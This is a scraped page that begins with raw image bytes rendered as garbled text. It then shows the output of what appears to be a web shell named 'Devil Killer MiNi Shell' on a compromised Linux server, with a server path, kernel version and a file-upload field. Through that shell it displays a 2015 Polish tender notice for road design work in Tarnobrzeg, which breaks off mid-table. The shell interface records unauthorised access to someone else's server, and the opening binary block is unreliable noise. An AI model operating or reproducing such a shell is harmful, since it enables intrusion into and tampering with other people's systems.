JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150807/118061-N-2015.html

<p class="kh_header"><b>Tarnobrzeg: Opracowanie dokumentacji projektowej  wraz z nadzorem  autorskim i przygotowaniem do realizacji zadania inwestycyjnego pn:
Modernizacja drogi powiatowej P1110R  w Tarnobrzegu, w tym :
    Część I.     Rozbudowa   ul. Mickiewicza w km 0+000 do km 1+221
Część II.    Rozbudowa  ul. Orląt Lwowskich w km 0+000 do km 2+248</b><br>
<b>Numer ogłoszenia: 118061 - 2015; data zamieszczenia: 07.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Tarnobrzega , ul. Kościuszki 32, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 015 8226570, faks 015 8222504.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej  wraz z nadzorem  autorskim i przygotowaniem do realizacji zadania inwestycyjnego pn:
Modernizacja drogi powiatowej P1110R  w Tarnobrzegu, w tym :
    Część I.     Rozbudowa   ul. Mickiewicza w km 0+000 do km 1+221
Część II.    Rozbudowa  ul. Orląt Lwowskich w km 0+000 do km 2+248.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie zadania pn.: 

Opracowanie dokumentacji projektowej  wraz z nadzorem  autorskim i przygotowaniem do realizacji zadania inwestycyjnego pn:
Modernizacja drogi powiatowej P1110R  w Tarnobrzegu, w tym :
    Część I.     Rozbudowa   ul. Mickiewicza w km 0+000 do km 1+221
    Część II.    Rozbudowa   ul. Orląt Lwowskich w km 0+000 do km 2+248 

1.1 Szczegółowy opis przedmiotu zamówienia 
Opracowanie dokumentacji projektowej wraz z  nadzorem  autorskim  i przygotowaniem do realizacji zadania  inwestycyjnego pn:
        Modernizacja drogi powiatowej P1110R w Tarnobrzegu , w tym :
        Część I.    Rozbudowa ul. Mickiewicza w km 0+000 do km 1+221,  od skrzyżowania z ul. Wisłostrada i Sikorskiego do skrzyżowania z ul. Siarkową i Orląt Lwowskich ,
   Część II.  Rozbudowa  ul. Orląt Lwowskich w km 0+000 do km 2+248, od skrzyżowania z ul. Siarkową do granic administracyjnych miasta Tarnobrzega.
umożliwiającej uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej zwanej dalej ZRID w trybie ustawy z dnia 10 kwietnia 2003 r.  o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych. 
2.2.  Zakres rzeczowy dokumentacji projektowej winien uwzględnić wykonanie następujących prac  budowlanych :
- Remont i przebudowę konstrukcji  jezdni oraz skrzyżowań z mieszanki mineralno-bitumicznej SMA 
- Przebudowę  poboczy z uwzględnieniem wykonania konstrukcji bitumicznej
- Remont istniejących zjazdów 
- Remont i przebudowę ciągów pieszych z uwzględnieniem potrzeb osób niepełnosprawnych 
- Budowę  ścieżek rowerowych
- Remont zatok autobusowych
- Przebudowę oświetlenia ulicznego
- Rozwiązanie kolizji z istniejącym uzbrojeniem nad i podziemnym
- Przebudowę elementów odwodnienia drogi , w tym: remont przepustów pod drogą, przebudowę kanalizacji deszczowej, przebudowę rowów przydrożnych
- Zmianę stałej organizacji ruchu ( oznakowanie poziome i pionowe) wynikającą z przyjętych rozwiązań 
- Budowę kanału technologicznego
- Umocnienia skarpy przy ul. Mickiewicza w celu zapewnienia jej stateczności(w razie potrzeby)
- Regulację ogrodzeń posesji sąsiadujących z pasem drogowym ( w razie potrzeby)
- Urządzenia bezpieczeństwa ruchu ( np. bariery drogowe) 
- Inne prace  wynikające z wydanych warunków, opinii i decyzji ( np. decyzji środowiskowych ) 
      UWAGA: konieczność zaprojektowania wszystkich w/w elementów należy uzgodnić z
      Zamawiającym po zapoznaniu się z wszystkimi warunkami w terenie.    


2.3. Szczegółowy zakres prac do wykonania przez Wykonawcę w ramach realizacji
      przedmiotu umowy   obejmuje wykonanie  dla Części I i II oddzielnie :  
1.	Przygotowanie we własnym zakresie i na własny koszt wszystkich materiałów do
 projektowania, w tym :
a.	Wykonanie wywiadu niwelacyjnego, i innych badań terenowych niezbędnych do opracowania dokumentacji projektowej,
b.	Sporządzenie mapy do celów projektowych, w tym map sytuacyjno - wysokościowych w zakresie niezbędnym do celów projektowych z inwentaryzacją wszystkich urządzeń i zieleni. Minimalna ilość egzemplarzy opracowania - 2 kpl. w wersji papierowej i elektronicznej - jeżeli zajdzie taka potrzeba,
c.	wykonanie aktualnych wypisów i wyrysów działek objętych zakresem projektowym.
d.	Wykonanie dokumentacji geologiczno - inżynierskiej stanu umocnień skarp przydrożnych i nośności gruntu - jeżeli zajdzie taka potrzeba. Minimalna ilość egzemplarzy opracowania - 2 kpl. w wersji papierowej   i elektronicznej
e.	Wykonanie dokumentacji hydrologicznej-jeżeli zajdzie taka potrzeba. Minimalna ilość egzemplarzy opracowania - 2 kpl. w wersji papierowej i elektronicznej
f.	Sporządzenie szczegółowej inwentaryzacji drzew i krzewów do usunięcia - w razie potrzeby . 
g.	Przygotowanie innych opracowań ,operatów, dokumentów , inwentaryzacji urządzeń i obiektów w zakresie wynikającym z   przyjętych przez Wykonawcę rozwiązań projektowych ( np. operatów wodno-prawnych dla przebudowy urządzeń wodnych- w razie potrzeby).
  2.  Przygotowanie w imieniu Zamawiającego wniosków wraz z wymaganymi załącznikami i 
         uzyskanie zezwolenia na usunięcie drzew i krzewów kolidujących z realizacją 
         zamierzenia inwestycyjnego - o ile zajdzie taka potrzeba. Minimalna ilość egzemplarzy  
         opracowania - 2 kpl. w wersji papierowej i elektronicznej (w formacie PDF, dwg) 
   3.   Przygotowanie wniosków do użytkowników mediów i uzyskanie w imieniu 
         Zamawiającego warunków technicznych włączenia, budowy, przebudowy i 
         zabezpieczenia urządzeń  infrastruktury technicznej, 
   4.   Uzyskanie  innych opinii,decyzji i uzgodnień,  wymaganych  potrzebami  projektowymi 
         i przyjętymi rozwiązaniami  .
    5.  Przygotowanie w imieniu Zamawiającego informacji o zamiarze rozpoczęcia
         rozbudowy drogi i możliwości zgłaszania zainteresowania udostępnieniem kanału
         technologicznego - celem zamieszczenia w BIP na stronie  zamawiającego.
    6.  Przygotowanie w imieniu Zamawiającego wniosków  wraz z kompletem dokumentów i
         opracowań stanowiących wymagane załączniki do tego wniosku i uzyskanie 
         prawomocnych decyzji  o środowiskowych uwarunkowaniach realizacji inwestycji w
         zakresie wymaganym przepisami ustawy Prawo ochrony środowiska .
    7. Opracowanie w wersji papierowej i elektronicznej wstępnej koncepcji architektonicznej,  
         zawierającej  propozycje  rozwiązań funkcjonalnych i przedłożenie Zamawiającemu do 
         zatwierdzenia  celem  ustalenia ostatecznego zakresu rzeczowego dokumentacji
     projektowych - 2 kpl. w wersji papierowej i elektronicznej
8. Opracowanie na podstawie uzyskanych warunków i decyzji projektu budowlanego we
     wszystkich branżach wraz z  informacją dotyczącą bezpieczeństwa i ochrony zdrowia - 
     BIOZ i uzyskanie w imieniu Zamawiającego wszystkich niezbędnych  uzgodnień i opinii - 
     zgodnie z obowiązującymi przepisami . Minimalna ilość  egzemplarzy opracowania - 6 kpl 
     w wersji papierowej i 2 kpl. w wersji elektronicznej (w formacie PDF i dwg.) 
9.   Opracowanie projektów wykonawczych we wszystkich branżach. Minimalna ilość
      egzemplarzy opracowania - 5  kpl. w wersji papierowej i 2 kpl. w wersji elektronicznej
      (w formacie PDF i dwg.),
10. Wykonanie i opracowanie pomiarów natężenia ruchu z określeniem struktury rodzajowej i 
      kierunkowej-jeżeli zajdzie taka potrzeba. Minimalna ilość egzemplarzy opracowania - 2
      kpl. w wersji papierowej i elektronicznej (w formacie PDF i dokument programu Word),
11. Opracowanie zgodnie z wydanymi  warunkami  i uzgodnienie z użytkownikami mediów
      rozwiązań projektowych dotyczących likwidacji wszystkich kolizji z uzbrojeniem
       technicznym terenu - nadziemnym i podziemnym, a także zjazdów, podjazdów, ogrodzeń 
      itp., odpowiednio wyprofilowanych uwzględniających likwidację barier 
      komunikacyjnych. Minimalna ilość egzemplarzy opracowania - 5  kpl. w wersji
       papierowej i 2 kpl. w wersji elektronicznej(w formacie PDF i dwg),
12. Opracowanie projektu zmiany stałej organizacji ruchu wraz z wymaganymi prawem
      opiniami i decyzją zatwierdzającą wydaną przez właściwy organ zarządzający ruchem.
      Minimalna ilość egzemplarzy opracowania - 5 kpl. w wersji papierowej i 2 kpl  w wersji 
      elektronicznej (w formacie PDF i dwg), 
13.Opracowanie geodezyjne map  podziałów  nieruchomości z wykazem zmian gruntowych,
      danych ewidencyjnych obiektów itp., dla potrzeb  wydzielenia nowego pasa drogowego i
       uzyskania decyzji zrid lub pozwolenia na budowę oraz uwierzytelnienie ich  w Grodzkim 
       Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Tarnobrzegu. 
14.  Sporządzenie wykazu reperów i wersję elektroniczną współrzędnych geodezyjnych dla
        celów obsługi geodezyjnej budowy. Minimalna ilość egzemplarzy opracowania - 2 kpl. 
         w wersji papierowej i elektronicznej,
15. Sporządzenie specyfikacji technicznych wykonania i odbioru robót dla wszystkich branż.
       Minimalna ilość egzemplarzy opracowania - 5 kpl. w wersji papierowej i 2 kpl  w wersji
       elektronicznej (w formacie PDF i dokument programu Word),
16. Sporządzenie przedmiarów robót dla wszystkich branż i wszystkich robót objętych 
      dokumentacją projektową ( Zamawiający zastrzega sobie opracowanie przedmiarów
      zgodnie z wymogami  instytucji dofinansowujących inwestycję, np. roboty kwalifikowane
       i niekwalifikowane - w razie potrzeby). Minimalna ilość egzemplarzy opracowania - 5 
       kpl. w wersji papierowej i elektronicznej (w formacie PDF , ath. i dokument programu
       Word), 
17. Sporządzenie kosztorysów inwestorskich dla wszystkich branż i wszystkich robót 
       objętych dokumentacją projektową ( Zamawiający zastrzega sobie opracowanie 
        przedmiarów zgodnie z wymogami instytucji dofinansowujących inwestycję , np. koszty 
        kwalifikowane i niekwalifikowane - w razie potrzeby). Minimalna ilość egzemplarzy
        opracowania - 3 kpl. w wersji papierowej i elektronicznej (w formacie PDF ,  ath. i 
        dokument programu  Word), 
18.  Sporządzenie kosztorysu inwestorskiego zbiorczego dla całego zakresu zamówienia 
        ( tj. dla Części I i II razem),  uwzględniający koszt robót na obydwu  ulicach . 
        Minimalna ilość egzemplarzy opracowania - 3 kpl. w wersji papierowej i elektronicznej 
        (w formacie PDF , ath. i dokument programu Word), 
 19.  Przygotowanie materiałów przetargowych w wersji elektronicznej dla celów udzielenia 
        zamówienia publicznego,  zawierających projekty budowlane, projekty wykonawcze , 
         STWiOR, przedmiary -  3 kpl. w formacie PDF - zgodnie z obowiązującymi
         przepisami.
20.  Przygotowanie stosownych wniosków wraz z kompletem  dokumentów , opracowań i
        pozwoleń stanowiących wymagane załączniki do tych wniosków  i uzyskanie na rzecz   
        Zamawiającego decyzji administracyjnych  zezwalających na  realizację inwestycji
       według opracowanych dokumentacji projektowych, tj. inwestycji celu publicznego( w
        razie potrzeby),  zezwolenia na realizację inwestycji drogowej , pozwolenia na budowę 
        itp ,zgodnie z obowiązującymi przepisami ustawy prawo budowlane i szczególnych 
       zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
 21. Wykonanie trwałej stabilizacji  wydzielonego  pasa drogowego po uzyskaniu 
        ostateczności decyzji pozwolenia na budowę lub zrid .
22.  Pełnienie nadzoru autorskiego nad realizacją robót budowlanych we wszystkich branżach
       objętych dokumentacją projektową do momentu ich zakończenia i podpisania przez
        komisję protokołu odbioru końcowego z wykonawcą  robót.
23.  Formułowanie odpowiedzi na pytania zadawane przez Wykonawców, a także 
        zainteresowane  strony w trakcie trwania postępowania o zamówienie publiczne i w
        trakcie prac, którego przedmiotem będzie realizacja robót wg dokumentacji projektowej, 
        która stanowi przedmiot zamówienia,
24.  Sporządzenie jednorazowej aktualizacji kosztorysów inwestorskich we wszystkich
        branżach i w całym zakresie robót objętych dokumentacją projektową - zgodnie z
        potrzebami Zamawiającego ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca przedstawi wraz z ofertą osobę, na funkcję wymienioną poniżej która spełnia następujące wymagania:
Osoba proponowana do pełnienia funkcji Projektant :
a) Branży drogowej
- minimalne doświadczenie i kwalifikacje:
Doświadczenie: wykonał ( a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej dwie dokumentacje projektowe, których przedmiotem było wykonanie projektu budowlanego lub budowlano-wykonawczego z zakresu budowy, przebudowy, remontu lub odbudowy dróg w tym jednej klasy minimum L i jednej klasy minimum Z .
Kwalifikacje: posiada uprawnienia budowlane bez ograniczeń do projektowania dróg w rozumieniu przepisów Rozporządzenia Ministra Infrastruktury i Rozwoju   z dnia 11 września 2014r  w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014 roku, poz. 1278 z późniejszymi zmianami).
b) Branży sanitarnej
- minimalne doświadczenie i kwalifikacje:
Kwalifikacje : posiada uprawnienia budowlane bez ograniczeń do projektowania sieci instalacji                 i urządzeń  kanalizacyjnych w  rozumieniu przepisów Rozporządzenia Ministra Infrastruktury i Rozwoju   z dnia 11 września 2014r  w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014 roku, poz. 1278 z późniejszymi zmianami).
c) Branży elektrycznej
- minimalne doświadczenie i kwalifikacje : 
Kwalifikacje : posiada uprawnienia budowlane bez ograniczeń do projektowania sieci, instalacji, urządzeń  elektrycznych  w  rozumieniu przepisów Rozporządzenia Ministra Infrastruktury i Rozwoju   z dnia 11 września 2014r  w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014 roku, poz. 1278 z późniejszymi zmianami).
d)  Branży budowlanej
      - minimalne doświadczenie i kwalifikacje:
     Kwalifikacje : posiada uprawnienia konstrukcyjno-budowlane bez ograniczeń do projektowania    
     konstrukcji obiektu  w  rozumieniu przepisów Rozporządzenia Ministra Infrastruktury i Rozwoju   z dnia 11   
     września 2014r  w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014 roku, poz. 
     1278 z późniejszymi zmianami
Uwaga: Zamawiający uzna uprawnienia równoważne do powyższych wydane na podstawie wcześniej obowiązujących przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin wykonania koncepcji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
